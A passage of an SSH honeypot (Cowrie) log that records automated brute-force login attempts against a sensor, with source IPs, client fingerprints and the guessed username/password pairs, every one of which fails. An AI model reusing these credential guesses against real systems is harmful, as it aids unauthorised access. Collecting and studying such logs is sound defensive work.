-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:29.670442Z","src_ip":"212.227.125.160","session":"d3d79426a1ef"}
{"eventid":"cowrie.login.failed","username":"pi","password":"admin1234","message":"login attempt [pi/admin1234] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:30.168630Z","src_ip":"212.227.125.160","session":"d3d79426a1ef"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:31.212341Z","src_ip":"212.227.125.160","session":"d3d79426a1ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56374,"dst_ip":"1.2.3.4","dst_port":22,"session":"234d6b7c6af6","protocol":"ssh","message":"New connection: 212.227.125.160:56374 (1.2.3.4:22) [session: 234d6b7c6af6]","sensor":"my-vps","timestamp":"2025-08-31T07:07:31.254306Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:31.257052Z","src_ip":"212.227.125.160","session":"234d6b7c6af6"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:31.299372Z","src_ip":"212.227.125.160","session":"234d6b7c6af6"}
{"eventid":"cowrie.login.failed","username":"pi","password":"andylau","message":"login attempt [pi/andylau] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:31.429315Z","src_ip":"212.227.125.160","session":"234d6b7c6af6"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:32.481619Z","src_ip":"212.227.125.160","session":"234d6b7c6af6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56386,"dst_ip":"1.2.3.4","dst_port":22,"session":"356f50565ca1","protocol":"ssh","message":"New connection: 212.227.125.160:56386 (1.2.3.4:22) [session: 356f50565ca1]","sensor":"my-vps","timestamp":"2025-08-31T07:07:32.523675Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:32.527855Z","src_ip":"212.227.125.160","session":"356f50565ca1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:32.591538Z","src_ip":"212.227.125.160","session":"356f50565ca1"}
{"eventid":"cowrie.login.failed","username":"pi","password":"0123456","message":"login attempt [pi/0123456] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:32.897793Z","src_ip":"212.227.125.160","session":"356f50565ca1"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:33.986308Z","src_ip":"212.227.125.160","session":"356f50565ca1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56400,"dst_ip":"1.2.3.4","dst_port":22,"session":"6329dfbe9f24","protocol":"ssh","message":"New connection: 212.227.125.160:56400 (1.2.3.4:22) [session: 6329dfbe9f24]","sensor":"my-vps","timestamp":"2025-08-31T07:07:34.057045Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:34.102417Z","src_ip":"212.227.125.160","session":"6329dfbe9f24"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:34.103191Z","src_ip":"212.227.125.160","session":"6329dfbe9f24"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1111","message":"login attempt [pi/1111] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:34.519301Z","src_ip":"212.227.125.160","session":"6329dfbe9f24"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:35.597577Z","src_ip":"212.227.125.160","session":"6329dfbe9f24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56414,"dst_ip":"1.2.3.4","dst_port":22,"session":"887e515f208b","protocol":"ssh","message":"New connection: 212.227.125.160:56414 (1.2.3.4:22) [session: 887e515f208b]","sensor":"my-vps","timestamp":"2025-08-31T07:07:35.650968Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:35.714350Z","src_ip":"212.227.125.160","session":"887e515f208b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:35.715132Z","src_ip":"212.227.125.160","session":"887e515f208b"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1q2w3e4r","message":"login attempt [pi/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:36.146040Z","src_ip":"212.227.125.160","session":"887e515f208b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:37.230630Z","src_ip":"212.227.125.160","session":"887e515f208b"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":56478,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a72e71d99c7","protocol":"ssh","message":"New connection: 102.210.148.92:56478 (1.2.3.4:22) [session: 3a72e71d99c7]","sensor":"my-vps","timestamp":"2025-08-31T07:07:54.733478Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:07:54.735339Z","src_ip":"102.210.148.92","session":"3a72e71d99c7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:07:54.915235Z","src_ip":"102.210.148.92","session":"3a72e71d99c7"}
{"eventid":"cowrie.login.failed","username":"username","password":"admin123!","message":"login attempt [username/admin123!] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:55.678445Z","src_ip":"102.210.148.92","session":"3a72e71d99c7"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:56.860524Z","src_ip":"102.210.148.92","session":"3a72e71d99c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53230,"dst_ip":"1.2.3.4","dst_port":22,"session":"714dd236bc61","protocol":"ssh","message":"New connection: 212.227.235.229:53230 (1.2.3.4:22) [session: 714dd236bc61]","sensor":"my-vps","timestamp":"2025-08-31T07:07:57.943742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:58.679184Z","src_ip":"212.227.235.229","session":"714dd236bc61"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:07:58.680157Z","src_ip":"212.227.235.229","session":"714dd236bc61"}
{"eventid":"cowrie.login.failed","username":"www","password":"P@ssw0rd123","message":"login attempt [www/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:08:04.837927Z","src_ip":"212.227.235.229","session":"714dd236bc61"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:08:06.674417Z","src_ip":"212.227.235.229","session":"714dd236bc61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42750,"dst_ip":"1.2.3.4","dst_port":22,"session":"33eb827de6e0","protocol":"ssh","message":"New connection: 212.227.125.160:42750 (1.2.3.4:22) [session: 33eb827de6e0]","sensor":"my-vps","timestamp":"2025-08-31T07:08:19.427834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:08:19.860919Z","src_ip":"212.227.125.160","session":"33eb827de6e0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:08:19.861635Z","src_ip":"212.227.125.160","session":"33eb827de6e0"}
{"eventid":"cowrie.login.failed","username":"www","password":"P@ssw0rd123","message":"login attempt [www/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:08:21.878064Z","src_ip":"212.227.125.160","session":"33eb827de6e0"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:08:23.301764Z","src_ip":"212.227.125.160","session":"33eb827de6e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":7153,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8d32553ca12","protocol":"ssh","message":"New connection: 212.227.235.229:7153 (1.2.3.4:22) [session: a8d32553ca12]","sensor":"my-vps","timestamp":"2025-08-31T07:08:37.396058Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T07:08:37.396752Z","src_ip":"212.227.235.229","session":"a8d32553ca12"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T07:08:37.522503Z","src_ip":"212.227.235.229","session":"a8d32553ca12"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T07:08:38.109670Z","src_ip":"212.227.235.229","session":"a8d32553ca12"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:08:39.239159Z","src_ip":"212.227.235.229","session":"a8d32553ca12"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:08:40.694966Z","src_ip":"212.227.125.160","session":"08391e314476"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:08:50.266931Z","src_ip":"212.227.125.160","session":"a508fd11cd38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59170,"dst_ip":"1.2.3.4","dst_port":22,"session":"84be244745b6","protocol":"ssh","message":"New connection: 212.227.235.229:59170 (1.2.3.4:22) [session: 84be244745b6]","sensor":"my-vps","timestamp":"2025-08-31T07:08:57.647126Z"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:08:58.336539Z","src_ip":"212.227.125.160","session":"83216e44d84a"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:08:58.421255Z","src_ip":"212.227.125.160","session":"4dc18b7b4893"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:08:58.462827Z","src_ip":"212.227.235.229","session":"84be244745b6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:08:58.463608Z","src_ip":"212.227.235.229","session":"84be244745b6"}
{"eventid":"cowrie.login.failed","username":"www","password":"letmein","message":"login attempt [www/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T07:09:04.172047Z","src_ip":"212.227.235.229","session":"84be244745b6"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:09:05.908636Z","src_ip":"212.227.235.229","session":"84be244745b6"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:09:07.731718Z","src_ip":"212.227.125.160","session":"762d37de7e35"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":48024,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a3deb2a1e2e","protocol":"ssh","message":"New connection: 102.210.148.92:48024 (1.2.3.4:22) [session: 4a3deb2a1e2e]","sensor":"my-vps","timestamp":"2025-08-31T07:09:11.264264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:09:11.264918Z","src_ip":"102.210.148.92","session":"4a3deb2a1e2e"}
